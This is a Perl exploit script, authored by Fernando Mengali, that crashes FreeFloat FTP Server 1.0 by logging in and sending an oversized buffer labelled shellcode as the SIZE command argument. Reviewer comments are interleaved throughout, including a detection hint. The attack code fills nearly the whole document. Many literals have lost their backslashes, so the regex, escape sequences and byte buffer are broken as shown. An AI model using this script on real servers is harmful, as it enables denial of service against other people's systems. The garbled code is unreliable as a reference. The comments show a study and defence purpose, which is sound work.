Authored by Fernando Mengali

FreeFloat FTP Server version 1.0 SIZE denial of service exploit.

#!/usr/bin/perl -w
#
# e-mail: [email protected]
#
# Date: 06/09/2021 - 09 jun
#
# Version Vulnerable: Freefloat FTP Server 1.0
#
# vídeo: https://youtu.be/de3lCDHLWFE
#
# OS Tested: Windows XP PACK 3 Brazilian
#


use Net::FTP;
use Term::ANSIColor;


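# Clear the terminal before any output is shown.
# $^O is "MSWin32" on native Windows builds of Perl and is never the string
# "windows", so a comparison against "windows" always selects "clear".
# The OS name is no longer printed: it was written immediately before the
# screen was cleared.
my $sis = $^O;
my $cmd = $sis eq 'MSWin32' ? 'cls' : 'clear';

system($cmd);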

# Show the usage banner unless both positional arguments (IP, port) are
# present and true. A literal "0" counts as missing here.
unless ($ARGV[0] && $ARGV[1]) {
    apresentacao();
}

# Print the usage banner to STDOUT and return print's result.
# "Modo de uso" is Portuguese for "usage": the script expects <IP> <Porta>
# (target address and port) on the command line.
sub apresentacao {
    # Non-interpolating literal; the text starts and ends with a newline.
    my $banner = q {
#############################################################################
# #
# [*] Freefloat FTP Server 1.0 - 'SIZE' - Denied of Service #
# #
# Author: Fernando Mengali #
# #
# [+] Modo de uso: perl exploit.pl <IP> <Porta> #
# #
############################ Code Exploit ###################################
};
    return print $banner;
}


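# Positional arguments: $alvo is the target address, $porta the TCP port.
our $alvo = $ARGV[0];
our $porta = $ARGV[1];

# Stop when either argument is missing. The usage banner is printed for this
# same condition; exiting only when both are absent would let a run with a
# single argument continue with an undefined port.
if (!$ARGV[0] || !$ARGV[1]) {
    exit;
}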


# Reject the target argument before any network activity; the message reads
# "Please set the target IP!".
# NOTE(review): as written the pattern has no backslash escapes, so "d{1,3}"
# matches the literal letter "d" and "." matches any character, and nothing
# anchors it. It is therefore not a dotted-quad IPv4 check. The string
# literals on this page show the same pattern ("nn" where newlines would be
# expected), which suggests the page text lost its backslashes in extraction;
# confirm against the original file.
if($alvo !~ /(d{1,3}.d{1,3}.d{1,3}.d{1,3})/) {
print color('red bold');
print " nn [-] Por favor, defina o IP alvo! nn";
# color() returns the escape sequence; called in void context the value is
# discarded, so no reset is written to the terminal here.
color('reset');
exit;
}

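# Validate the port argument; the message reads "Please set a port from 1 to
# 65535!". The check now matches that message: non-numeric input and port 0
# are rejected, where the previous lower bound (< 0) let both through.
if ($porta !~ /\A[0-9]+\z/ || $porta < 1 || $porta > 65535) {
    print color('red bold');
    print " \n\n [-] Por favor, defina uma porta de 1 a 65535! \n\n";
    # color() only returns the escape sequence, so it has to be printed for
    # the terminal attributes to be restored before exiting.
    print color('reset');
    exit;
}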

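# Echo the accepted target ("Alvo definido") and port ("Porta definida").
print color('green bold');
print "\n\nAlvo definido =>" . $alvo . " \n \n";
print "Porta definida =>" . $porta . "\n\n";
# color() returns the escape sequence rather than emitting it; print it so
# the green/bold attributes do not leak into later output.
print color('reset');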

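# Prompt for the FTP account name ("nome de usuário").
print color('yellow bold');
print "[+] Por favor, informe a nome de usuário: ";
print color('reset');    # color() only returns the sequence; print it
print color('red bold');
my $usuario = <STDIN>;
# <STDIN> yields undef at end of input; fall back to an empty string so
# chomp and the later login call do not operate on undef.
$usuario = '' unless defined $usuario;
chomp($usuario);
print color('reset');

# Prompt for the password ("senha de acesso").
# NOTE: the password is read with terminal echo left on, so it is visible
# on screen and in any terminal log or session recording.
print color('yellow bold');
print "[*] Por favor, informe a senha de acesso: ";
print color('reset');
print color('red bold');
my $senha = <STDIN>;
$senha = '' unless defined $senha;
chomp($senha);
print color('reset');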

# Buffer that is later sent as the argument of the FTP SIZE command.
# Despite the variable name, this page describes the outcome only as a
# denial of service; nothing here shows these bytes being executed.
# NOTE(review): as extracted, the literal contains no backslashes, so Perl
# reads it as plain ASCII text and not as the byte values the "xNN" notation
# suggests. It is kept exactly as found on the page.
# Defensive angle: the argument is well over a thousand characters as
# written and is not a plausible file path, so a length limit on FTP command
# lines (at a proxy, in an IDS rule or in the server) is a reasonable place
# to catch this class of request.
my $shellcode =
"xbax17x61x66xafxdbxd9xd9x74x24xf4x5dx2bxc9" .
"xb1x60x31x55x12x83xedxfcx03x42x6fx84x5axb7" .
"xa9xf0x15x7bxd9xfbx8fxf7x01x08x75xdcx80x41" .
"xd3x13x51xbaxe7x11x4dx39x25x21xb3x27x8bx30" .
"xefxf1xacxbdx95xe9xcfx1ax1dxb9xe1xf6x27x0b" .
"xffx02x98xc0xf6xc7x19x52xc4x94x18xdbx56x20" .
"xb6x9axc4xb5xecxf3x40xd4x19x17x6dx35x50x3a" .
"x13xc3xb3xf0x38x8dxffxc5x05x55x33xe7xd2x9e" .
"xb6x8cx9bx79xcex8fxd6x30x72x12x62x26x3exed" .
"xefxdax23x88x07x74xdcxbexe1xc4x3ex91x8ax26" .
"x3ax3fx2bxf2xe5x3ax18x0fxd0x8dx7bxbaxf3xba" .
"x2bx5bxa5x2dx54xaax88x68x4bxf4xccx24x68xc1" .
"x19x22xf9x08xd6x08x8fx4axe0x7dx67xc1x4exd8" .
"x08x34x44x2bx6ax6fx41x6dx53x26x73x9dxb4xca" .
"x87xedxe6x2dx8bx1cx42x0exb3x20xd0xa1x48x97" .
"x45x46x26x6bxe7x74x52xc1xaex2dx8dx1ax06xe0" .
"x24x26xbexfex26xf8x48x75x73x5dx6cx67xebxf4" .
"xf4x08x91xf8x5fx4ax3axd4x5cxd4x7cx52x13xa5" .
"x08x06xc9x8bx04x9ax0fxe5xe8x1fxefx28x3bxe9" .
"x6exf9xeex7exf0x5cx5ex4fx95x49x0fx83xf0x70" .
"x09xf6x83xe9x43xb8xe0x88x51x6ex9cx5dx48x5b" .
"x9bxcax9axf1x48xa8x51x22x61x12x55xfex10x16" .
"xb5x42x42xffx15x14x3fx44x9bx92xfcxd9x67xe0" .
"x15xd1x64xcex75xecxa3x08x03x61x4ax3bx0ex5a" .
"xb0x7bxe6x2cxacxaex5dxadx71xf5xb8xc4x4fxd3" .
"xf4x40x2bx92x75x83xe3x0fx4cx23x78x72x0fx22" .
"xb9x10xa6x1dxc9xcbxcaxe5x61xf8x5fx64x86x49" .
"x5bxb2x9ex75x30xc6x6ex3cx9ax02xadx03x36x29" .
"xafx84x62x98x22xcdxbfx7exa2x14x97x75xa2xc3" .
"xab";


# Connect, authenticate, send one SIZE request, then exit.
# What a monitor would see, going by the calls below: a login followed by a
# single SIZE command with an oversized argument, with no quit() call before
# the client exits. The page lists version 1.0 as vulnerable and names no
# fixed release.
#
# NOTE(review): "rn" is appended as two literal letters; like the other
# literals on this page it carries no backslashes, so confirm against the
# original file.
$payload = $shellcode . "rn";

print color('cyan');
# Status line: "Connecting to server <target>:<port>...".
print "nn[+] Conectando para o servidor " . $alvo . ":" . $porta."... n";
# Open the FTP control connection; die with "could not connect" when the
# constructor returns a false value.
$ftp = Net::FTP->new($alvo, Debug => 0, Port => $porta) || die color('red')."n[-] Não foi possível conectar. n";
# The sleep() calls only pace the status output.
sleep(2);
print "[+] Conectado!n";
sleep(2);
# Authenticate with the credentials read from stdin. The SIZE command is sent
# only after login() returns true, so on this page the request comes from an
# authenticated session.
# NOTE(review): $! is the OS-level errno and may not describe an FTP-level
# refusal; the server's reply text is available from $ftp->message.
$ftp->login($usuario,$senha) || die color('red')."n [-] Não pode conectar ou você derrubou: $!";
# "Authenticating..." and "Authenticated successfully!" are printed after
# login() has already succeeded.
print "[+] Autenticando...n";
sleep(2);
print "[+] Autenticado com sucesso!nn";
sleep(2);
# Status line: "Overloading the server...".
print "[*] Sobrecarregando o servidor...nn";
sleep(2);
# Send "SIZE" plus the long argument as a raw command. No reply is read
# afterwards: there is no response() call on this page.
$ftp->command("SIZE ", $payload);
# color() returns the escape sequence; in void context the value is
# discarded, so this line (and the one before exit) writes nothing.
color('reset');
print color('green bold');
# "Server down!" is printed unconditionally; the script never checks whether
# the service actually stopped responding.
print "[+] Servidor fora do ar!n";
color('reset');
exit(0);